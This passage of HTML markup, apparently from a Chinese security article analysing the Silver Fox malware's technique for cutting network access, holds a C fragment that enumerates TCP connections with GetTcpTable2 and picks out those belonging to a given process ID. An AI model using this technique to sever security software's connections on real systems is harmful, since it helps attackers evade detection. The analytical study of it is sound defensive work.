style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">GetTcpTable2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">tcpTable, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">size, TRUE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">!=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NO_ERROR</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">free</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[!] Failed to get TCP table.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">int</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> closedCount </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">for</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD i </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> i </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwNumEntries</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">++</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">i</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">MIB_TCPROW2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> row </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">table</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">i</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">];</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwOwningPid </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pid </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> row</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwState </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim 